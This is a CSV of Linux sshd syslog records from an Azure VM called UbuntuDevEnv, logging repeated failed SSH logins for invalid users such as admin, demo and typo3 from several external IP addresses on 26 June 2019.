+13027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:15,UbuntuDevEnv,2019-06-26 04:24:15,auth,UbuntuDevEnv,info,Failed password for invalid user salman from 45.55.190.46 port 48744 ssh2,126379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,salman,45.55.190.4,48744,,
+13028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:15,UbuntuDevEnv,2019-06-26 04:24:15,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 48744:11: Bye Bye [preauth],126379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,48744,,
+13029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:15,UbuntuDevEnv,2019-06-26 04:24:15,auth,UbuntuDevEnv,info,Disconnected from invalid user salman 45.55.190.46 port 48744 [preauth],126379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,salman,45.55.190.4,48744,,
+13030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:32,UbuntuDevEnv,2019-06-26 04:24:32,auth,UbuntuDevEnv,info,Invalid user elias from 5.135.161.72 port 46858,126506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elias,5.135.161.7,46858,,
+13031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:32,UbuntuDevEnv,2019-06-26 04:24:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,126506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:32,UbuntuDevEnv,2019-06-26 04:24:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:34,UbuntuDevEnv,2019-06-26 04:24:34,auth,UbuntuDevEnv,info,Failed password for invalid user elias from 5.135.161.72 port 46858 ssh2,126506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elias,5.135.161.7,46858,,
+13034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:34,UbuntuDevEnv,2019-06-26 04:24:34,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 46858:11: Bye Bye [preauth],126506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,46858,,
+13035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:34,UbuntuDevEnv,2019-06-26 04:24:34,auth,UbuntuDevEnv,info,Disconnected from invalid user elias 5.135.161.72 port 46858 [preauth],126506,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elias,5.135.161.7,46858,,
+13036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:49,UbuntuDevEnv,2019-06-26 04:24:49,auth,UbuntuDevEnv,info,Invalid user demo from 119.123.240.8 port 46495,126562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,119.123.240.8,46495,,
+13037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:49,UbuntuDevEnv,2019-06-26 04:24:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:49,UbuntuDevEnv,2019-06-26 04:24:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,126562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:51,UbuntuDevEnv,2019-06-26 04:24:51,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 119.123.240.8 port 46495 ssh2,126562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,119.123.240.8,46495,,
+13040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:52,UbuntuDevEnv,2019-06-26 04:24:51,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 46495:11: Bye Bye [preauth],126562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,46495,,
+13041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:52,UbuntuDevEnv,2019-06-26 04:24:51,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 119.123.240.8 port 46495 [preauth],126562,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,119.123.240.8,46495,,
+13042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:09,UbuntuDevEnv,2019-06-26 04:25:08,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 34100,126641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,34100,,
+13043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:09,UbuntuDevEnv,2019-06-26 04:25:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:09,UbuntuDevEnv,2019-06-26 04:25:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,126641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+13045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:11,UbuntuDevEnv,2019-06-26 04:25:10,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 34100 ssh2,126641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,34100,,
+13046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:11,UbuntuDevEnv,2019-06-26 04:25:10,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 34100: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",126641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,34100,,
+13047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:11,UbuntuDevEnv,2019-06-26 04:25:11,auth,UbuntuDevEnv,info,Invalid user 424246 from 95.216.195.95 port 47804,126653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,47804,,
+13048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:11,UbuntuDevEnv,2019-06-26 04:25:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:11,UbuntuDevEnv,2019-06-26 04:25:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,126653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:13,UbuntuDevEnv,2019-06-26 04:25:13,auth,UbuntuDevEnv,info,Failed password for invalid user 424246 from 95.216.195.95 port 47804 ssh2,126653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,47804,,
+13051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:13,UbuntuDevEnv,2019-06-26 04:25:13,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 47804:11: Bye Bye [preauth],126653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,47804,,
+13052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:13,UbuntuDevEnv,2019-06-26 04:25:13,auth,UbuntuDevEnv,info,Disconnected from invalid user 424246 95.216.195.95 port 47804 [preauth],126653,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,47804,,
+13053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:14,UbuntuDevEnv,2019-06-26 04:25:13,auth,UbuntuDevEnv,info,Invalid user tphan from 196.41.208.238 port 13725,126661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tphan,196.41.208.2,13725,,
+13054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:14,UbuntuDevEnv,2019-06-26 04:25:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:14,UbuntuDevEnv,2019-06-26 04:25:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,126661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:16,UbuntuDevEnv,2019-06-26 04:25:16,auth,UbuntuDevEnv,info,Failed password for invalid user tphan from 196.41.208.238 port 13725 ssh2,126661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tphan,196.41.208.2,13725,,
+13057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:16,UbuntuDevEnv,2019-06-26 04:25:16,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 13725:11: Bye Bye [preauth],126661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,13725,,
+13058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:16,UbuntuDevEnv,2019-06-26 04:25:16,auth,UbuntuDevEnv,info,Disconnected from invalid user tphan 196.41.208.238 port 13725 [preauth],126661,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tphan,196.41.208.2,13725,,
+13059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:46,UbuntuDevEnv,2019-06-26 04:25:45,auth,UbuntuDevEnv,info,Invalid user bacula from 177.23.90.10 port 53550,126764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bacula,177.23.90.1,53550,,
+13060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:46,UbuntuDevEnv,2019-06-26 04:25:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:46,UbuntuDevEnv,2019-06-26 04:25:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,126764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:48,UbuntuDevEnv,2019-06-26 04:25:48,auth,UbuntuDevEnv,info,Failed password for invalid user bacula from 177.23.90.10 port 53550 ssh2,126764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bacula,177.23.90.1,53550,,
+13063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:48,UbuntuDevEnv,2019-06-26 04:25:48,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 53550:11: Bye Bye [preauth],126764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,53550,,
+13064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:25:48,UbuntuDevEnv,2019-06-26 04:25:48,auth,UbuntuDevEnv,info,Disconnected from invalid user bacula 177.23.90.10 port 53550 [preauth],126764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bacula,177.23.90.1,53550,,
+13065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:36,UbuntuDevEnv,2019-06-26 04:26:36,auth,UbuntuDevEnv,info,Invalid user nasa123 from 95.216.195.95 port 36672,126955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nasa123,95.216.195.9,36672,,
+13066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:36,UbuntuDevEnv,2019-06-26 04:26:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,126955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:36,UbuntuDevEnv,2019-06-26 04:26:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:38,UbuntuDevEnv,2019-06-26 04:26:37,auth,UbuntuDevEnv,info,Failed password for invalid user nasa123 from 95.216.195.95 port 36672 ssh2,126955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nasa123,95.216.195.9,36672,,
+13069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:38,UbuntuDevEnv,2019-06-26 04:26:37,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 36672:11: Bye Bye [preauth],126955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,36672,,
+13070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:38,UbuntuDevEnv,2019-06-26 04:26:37,auth,UbuntuDevEnv,info,Disconnected from invalid user nasa123 95.216.195.95 port 36672 [preauth],126955,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nasa123,95.216.195.9,36672,,
+13071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:43,UbuntuDevEnv,2019-06-26 04:26:42,auth,UbuntuDevEnv,info,Invalid user antonio from 200.6.188.38 port 48107,126973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,antonio,200.6.188.3,48107,,
+13072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:43,UbuntuDevEnv,2019-06-26 04:26:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:43,UbuntuDevEnv,2019-06-26 04:26:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,126973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:45,UbuntuDevEnv,2019-06-26 04:26:45,auth,UbuntuDevEnv,info,Failed password for invalid user antonio from 200.6.188.38 port 48107 ssh2,126973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,antonio,200.6.188.3,48107,,
+13075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:45,UbuntuDevEnv,2019-06-26 04:26:45,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 48107:11: Bye Bye [preauth],126973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,48107,,
+13076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:26:45,UbuntuDevEnv,2019-06-26 04:26:45,auth,UbuntuDevEnv,info,Disconnected from invalid user antonio 200.6.188.38 port 48107 [preauth],126973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,antonio,200.6.188.3,48107,,
+13077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:27:51,UbuntuDevEnv,2019-06-26 04:27:51,auth,UbuntuDevEnv,info,Invalid user typo3 from 5.135.161.72 port 58180,127216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,typo3,5.135.161.7,58180,,
+13078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:27:51,UbuntuDevEnv,2019-06-26 04:27:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:27:51,UbuntuDevEnv,2019-06-26 04:27:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,127216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:27:54,UbuntuDevEnv,2019-06-26 04:27:53,auth,UbuntuDevEnv,info,Failed password for invalid user typo3 from 5.135.161.72 port 58180 ssh2,127216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,typo3,5.135.161.7,58180,,
+13081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:27:54,UbuntuDevEnv,2019-06-26 04:27:53,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 58180:11: Bye Bye [preauth],127216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,58180,,
+13082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:27:54,UbuntuDevEnv,2019-06-26 04:27:53,auth,UbuntuDevEnv,info,Disconnected from invalid user typo3 5.135.161.72 port 58180 [preauth],127216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,typo3,5.135.161.7,58180,,
+13083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:01,UbuntuDevEnv,2019-06-26 04:28:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238  user=man,127246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,man,196.41.208.2,,0,
+13084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:03,UbuntuDevEnv,2019-06-26 04:28:02,auth,UbuntuDevEnv,info,Failed password for man from 196.41.208.238 port 62920 ssh2,127246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,62920,,
+13085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:03,UbuntuDevEnv,2019-06-26 04:28:02,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 62920:11: Bye Bye [preauth],127246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,62920,,
+13086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:28:03,UbuntuDevEnv,2019-06-26 04:28:02,auth,UbuntuDevEnv,info,Disconnected from authenticating user man 196.41.208.238 port 62920 [preauth],127246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,man,196.41.208.2,62920,,
